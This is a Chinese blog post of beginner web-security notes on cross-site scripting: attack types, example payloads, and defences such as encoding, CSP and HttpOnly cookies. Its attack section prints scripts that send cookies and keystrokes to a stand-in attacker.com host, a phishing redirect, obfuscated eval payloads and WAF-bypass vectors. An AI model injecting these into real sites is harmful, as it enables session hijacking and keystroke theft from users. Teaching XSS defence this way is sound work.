web安全入门学习笔记8——XSS原理及实践

原创 已于 2025-07-21 11:50:56 修改 · 936 阅读 · 17 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #学习 #笔记 #php #xss #html

于 2025-07-21 11:47:00 首次发布

XSS(跨站脚本攻击)深度解析

一、XSS攻击原理图解

XSS核心原理​​:攻击者通过在网站中注入恶意脚本,当其他用户访问网站时,浏览器会执行这些恶意脚本,从而实现攻击目的。

二、XSS攻击三种类型

1. 反射型XSS(非持久化)

攻击特征​​:

  • 恶意脚本包含在URL参数中
  • 需要诱导用户点击特定链接
  • 不存储在服务器上

2. 存储型XSS(持久化) 

攻击特征​​:

  • 恶意内容存储在服务器数据库中
  • 所有访问受影响页面的用户都会中招
  • 危害最大且持续性强

3. DOM型XSS(客户端处理漏洞) 

攻击特征​​:

  • 完全在客户端发生
  • 不涉及服务器处理
  • 漏洞在客户端JavaScript代码中

三、XSS脚本生成与攻击方式

1. 基础攻击脚本示例

<!-- 窃取用户Cookie -->
<script>
var image = new Image();
image.src = "http://attacker.com/steal?cookie=" + document.cookie;
</script>

<!-- 重定向到钓鱼网站 -->
<script>
window.location.href = "http://phishing.com";
</script>

<!-- 键盘记录器 -->
<script>
document.onkeypress = function(e) {
    new Image().src = "http://attacker.com/log?key=" + e.key;
}
</script>

2. 高级混淆技术 

// 十六进制编码
eval("\x61\x6c\x65\x72\x74\x28\x27\x58\x53\x53\x27\x29");

// Base64编码
eval(atob('YWxlcnQoJ1hTUycp'));

// 字符串拼接
(window["\x65\x76\x61\x6c"])("ale"+"rt(1)");

// JSfuck编码(仅用6个字符)
[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]][([]+{})[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[][]][(![]+[])[+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]]]]([][[]]+[])[+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+!+[]]+([][[]]+[])[+!+[]]]()[+[]][+[]])()

3. 绕过WAF防护

<!-- 大小写绕过 -->
<ScRiPt>alert(1)</ScRiPt>

<!-- 属性编码绕过 -->
<img src="x" onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;">

<!-- 无标签事件 -->
<svg onload=alert(1)>

<!-- 利用特殊事件 -->
<body onpagehide=alert(1)>

四、XSS攻击实战演示

攻击场景:留言板存储型XSS

<!-- 漏洞页面:show_comment.php -->
<div class="comment">
    <?= $_GET['comment'] ?> <!-- 未过滤直接输出 -->
</div>

<!-- 恶意留言注入 -->
<script>
// 获取用户Cookie
var cookie = document.cookie;

// 创建隐藏图片发送数据
var img = new Image();
img.src = "http://attacker.com/steal?data=" + 
          encodeURIComponent(cookie);
</script>

攻击效果:

  1. 用户访问留言板页面
  2. 浏览器加载并执行恶意脚本
  3. 用户Cookie被发送到攻击者服务器
  4. 攻击者利用Cookie登录用户账户

五、XSS防御策略详解

1. 输入验证(前端+后端)

// PHP输入过滤示例
function sanitize_input($input) {
    // 移除特殊字符
    $clean = htmlspecialchars($input, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    // 限制特殊字符
    $clean = preg_replace('/[^a-zA-Z0-9\u4e00-\u9fa5\s.,?!]/', '', $clean);
    return $clean;
}

// 使用前进行过滤
$safe_comment = sanitize_input($_POST['comment']);

2. 输出编码(上下文敏感)

输出位置编码方法PHP函数
HTML正文HTML实体编码htmlspecialchars()
HTML属性HTML属性编码htmlspecialchars(ENT_QUOTES)
URL参数URL编码urlencode()
JavaScriptJavaScript编码json_encode()
<!-- HTML输出 -->
<div><?= htmlspecialchars($content, ENT_QUOTES) ?></div>

<!-- 属性输出 -->
<input value="<?= htmlspecialchars($value, ENT_QUOTES) ?>">

<!-- JavaScript输出 -->
<script>
var userData = <?= json_encode($data) ?>;
</script>

3. 内容安全策略(CSP)

# HTTP响应头示例
Content-Security-Policy: 
    default-src 'self';
    script-src 'self' https://trusted.cdn.com;
    img-src *;
    style-src 'unsafe-inline';
    connect-src 'self';

​CSP策略解释​​:

  • default-src 'self':默认只允许同源资源
  • script-src 'self'...:脚本只允许同源和指定CDN
  • img-src *:允许所有来源的图片
  • style-src 'unsafe-inline':允许行内样式(慎用)
  • connect-src 'self':只允许同源API请求

4. HttpOnly Cookie保护 

Set-Cookie: sessionID=abc123; HttpOnly; Secure; SameSite=Strict
  • ​HttpOnly​​:阻止JavaScript访问Cookie
  • ​Secure​​:仅通过HTTPS传输
  • ​SameSite​​:阻止跨站点请求伪造(CSRF)

5. XSS防御框架函数对比

函数安全特性推荐指数
innerText自动编码★★★★★
textContent自动编码★★★★★
innerHTML不安全
document.write()高风险
eval()极高风险✘✘✘

六、现代框架中的XSS防护

1. React自动防护机制

function UserProfile({ bio }) {
    // React自动对变量进行转义
    return <div>{bio}</div>;
}

// 需要HTML渲染时明确使用dangerouslySetInnerHTML
function MarkdownViewer({ html }) {
    return <div dangerouslySetInnerHTML={{ __html: sanitize(html) }} />;
}

 2. Vue.js的自动编码

<template>
    <!-- 自动编码 -->
    <div>{{ userContent }}</div>
    
    <!-- 需要HTML时使用v-html -->
    <div v-html="sanitizeHTML(content)"></div>
</template>

3. 服务端渲染(SSR)防护 (node代码)

// Express + EJS防护
const express = require('express');
const app = express();

app.set('view engine', 'ejs');
app.locals.escape = require('lodash.escape');

// 在EJS模板中:
<%= escape(userContent) %>

七、XSS攻击检测与工具

1. 自动化扫描工具

  • ​OWASP ZAP​​:开源Web应用扫描器
  • ​Burp Suite​​:专业渗透测试工具
  • ​XSSer​​:XSS专用检测框架

2. 手工检测方法 

// 测试Payload
"><img src=x onerror=alert(1)>
'><svg/onload=confirm(1)>
</script><script>alert(1)</script>

// DOM XSS测试
#javascript:alert(1)
#<img src=x onerror=alert(1)>

八、企业级XSS防护架构 

                          +------------+
                          |  Web应用防火墙   |
                          | (WAF)       |
                          +------+-----+
                                 |
+-----------+      +-----------+ | +-----------+
| 输入过滤网关 |<--->| 应用服务器  | | | 输出编码层  |
+-----------+      +-----------+ | +-----------+
                                 |
                          +------v-----+
                          | 浏览器防护   |
                          | (CSP + SRI) |
                          +------------+

关键组件:
1. WAF:过滤常见XSS攻击向量
2. 输入过滤:服务器端参数消毒
3. 输出编码:上下文感知编码
4. CSP:内容安全策略
5. SRI:子资源完整性

完整防御建议​​:

  1. ​前端​​:对所有用户输入进行严格过滤
  2. ​后端​​:双重验证+输出编码
  3. ​传输​​:强制HTTPS+SRI资源校验
  4. ​客户端​​:强CSP策略+HttpOnly Cookie
  5. ​审计​​:定期进行XSS扫描和渗透测试

检测步骤​​:

  1. 识别用户输入点(表单、URL、headers)
  2. 测试基本Payload:<script>alert(1)</script>
  3. 测试绕过技巧:<img src=x onerror=alert(1)>
  4. 验证输出编码效果
  5. 检查CSP策略合规性

通过多层次的防御策略组合,可有效防护99%以上的XSS攻击场景。安全不是一次性工作,而是需要持续投入的工程实践。

[网络安全自学篇] 十八.XSS跨站脚本攻击原理及代码攻防演示(一)
杨秀璋的专栏
10-12 2万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了Python弱口令攻击、自定义字典生成,并构建了Web目录扫描器;本文将详细讲解XSS跨站脚本攻击,从原理、示例、危害到三种常见类型(反射型、存储型、DOM型),并结合代码示例进行详细讲解,最后分享了如何预防XSS攻击。本文参考了爱春秋ADO老师的课程内容,这里也推荐大家观看他Bilibili和ichunqiu的课程,同时也结合了作者之前的编程经验进行讲解。
xss 笔记
LAngle9的博客
03-24 673
1,xss : 因为和css 冲突,改名字是xss,属于客户端攻击,网站管理员也是用户,攻击者盗取管理员的cookie,靠管理员身份作为“跳板”进行实施攻击。 XSS攻击最终目的是在网页中嵌入客户端恶意脚本代码,最常用的攻击代码是javascript语言,但也会使用其它的脚本语言 j avascript语言:是跨平台的,在jsp,php,asp,aspx,都可以使用 xss 用的脚本是可以构造的,有两千多种方法,要记者常用的函数就行 script, alert, img src 1.2 XS.
XSS跨站脚本攻击过程最简单演示
热门推荐
smstong的成长轨迹
02-06 8万+
实例演示XSS的攻击全过程。
XSS原理
weixin_34372728的博客
12-31 143
跨站脚本攻击(Cross-Site Scripting),是一种网站应用程序的安全漏洞,是代码注入攻击的一种。 XSS的种类: 反射型XSS: 非持久型XSS(需要自行触发,输入-输出)。 从目标服务器通过错误信息、搜索结果等等方式“反射”出来的。 非持久性:这种攻击方式往往只具有一次性。 方式:攻击者通过邮件的方式将含有注入脚本的恶意的链接发送给受害者,受害者点击链接...
Web 安全 XSS
weixin_62319197的博客
06-30 1007
XSS 又叫CSS (Cross Site Scripting) 跨站脚本攻击为了和网页开发中的css区分开来,一般叫作XSSXSS主要是前端的漏洞。 在存在XSS漏洞的网页中 几乎可以实现JavaScript能实现的一切。例如 盗取用户cookie,黑掉网页,跳转到某网站,蠕虫,黑客只需要在页面中写入js代码即可。xss就是攻击者在网页中写入恶意的脚本代码,以此达到攻击目的 一般为JavaScript 有少数是ActionScript VBScript 所以说要想学懂XSS漏洞,必须学会XSS。攻击者
浅谈xss原理
weixin_34308389的博客
05-04 129
近日,论坛上面XSS满天飞,各处都能够见到XSS的痕迹,前段时间论坛上面也出现了XSS的迹象。然后我等小菜不是太懂啊,怎么办?没办法仅仅有求助度娘跟谷歌这对情侣了。 能够说小菜也算懂了一些。不敢藏私,故发文出来大家一块学习,讨论。 以下是正文: 0x00:xss的来由 记得之前看过一篇文章,这样来形容XSS “ 假设把浏览器看作WEB2.0后时代的操作系统。...
Web安全入门学习笔记5——php语言基础
最新发布
sinat_36670976的博客
07-18 567
本教程快速介绍了PHP中与网络安全相关的重要知识。在CTF中,你会经常遇到上述漏洞类型。学习PHP安全,不仅要了解如何利用这些漏洞,还要知道如何防御。请继续深入学习PHP,并实践编写安全的代码。注意:在实际应用中,使用最新的PHP版本(避免已知漏洞)并遵循安全开发规范。
学习笔记】PythonWeb(Ⅰ)—— Flask
Eddie_hyh的博客
04-08 1991
PythonWeb第一部分:Flask
WEB安全学习笔记
chenrs727的博客
12-02 2226
基础入门 1.基础入门——基础概念 域名 什么是域名 域名(英语:Domain Name),又称网域,是由一串用点分隔的名字组成的Internet上某一台计算机或计算机组的名称,用于在数据传输时对计算机的定位标识(有时也指地理位置) 由于IP地址具有不方便记忆并且不能显示地址组织的名称和性质等缺点,人们设计出了域名,并通过网域名称系统(DNS,Domain Name System)来将域名和IP地址相互映射,使人更方便地访问互联网,而不用去记住能够被机器直接读取的IP地址数串。 比如www.bai
PHP入门学习笔记整理:核心知识点汇总
根据所提供的文件信息,《php学习笔记》是一份专为初学者设计的学习资料,内容涵盖了PHP编程中的核心知识点,适合希望掌握Web开发基础的入门者系统学习。该笔记以简洁明了的方式整理了PHP的关键语法、常用函数、程序...
xss笔记
捡糖的echo
06-24 204
XSS本质:用户浏览页面的时候加载恶意脚本谁访问恶意脚本,攻击谁成功Xss盲打:在某个私密页面插入恶意脚本,数据传到后台的统计里面,前台没有xss漏洞(数据传入后台的时候是否会被转义而不具备攻击性?),后台存在xss漏洞,能否攻击成功?原理:防守xss其中一个措施是过滤特殊字符,好的做法是对输入的参数进行转义,而保留用户完整的输入字符串,传入后台的时候被转义的字符会被解析,后台应该同样对输入进行检...
XSS笔记
fuyingyinger的博客
11-17 158
什么是XSSXSS:Cross Site Scprit恶意攻击者利用web页面的漏洞,插入一些恶意代码(就比方说在url中或是输入框中插入一些代码),当用户访问页面时(比方说点击了某个链接),代码就会被执行,这时就完成了攻击的目的。 我们在前面主要介绍了Java Script的脚本,其实,还有很多种类型的脚本,比方说:Java,VBScript,ActiveX,Flash等。 XSS的分类 总体上,我们可以将XSS分为两类:反射型和存储型 反射型XSS(非持久型:点击一次,发生一次)以GET传参为例
xss(笔记)
weixin_45291045的博客
10-30 693
文章目录xss原理xss的危害xss分类如何测试xss xss原理 xss其实就是HTML代码注入,恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。 xss的危害 盗取cookie 网络钓鱼 劫持用户会话 网页挂马 等等 xss分类 反射型xss(非持久型) 一般出现在搜索框,get传参里 传参不会进入数据库,需要进行社工,诱骗管理员点击链接 存储型xss(持久型) 一般出现在,留言框,设置资料的框,各种跟数据库有
初级安全入门——XSS注入的原理与利用
weixin_30872733的博客
04-16 943
XSS的简单介绍 跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户目的。 XSS危害: 流量劫持 获取用户cookie信息,盗取账号 篡...
WEB安全 CSRF/XSS
jlin991的博客
02-28 1087
XSS定义跨站脚本攻击,网站应用程序的安全漏洞攻击,代码注入的一种。把恶意代码注入到网页上,使得用户在观看网页的时候受到影响。 XSS 跨站脚本攻击 Cross site Scipting原因 主要原因是多数用户的输入没有被转义,而直接执行。 XSS可以获取到用户cookie或隐私客户端信息。比如通过location.hash假设某个网站有一段脚本:$('#box').html(location
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值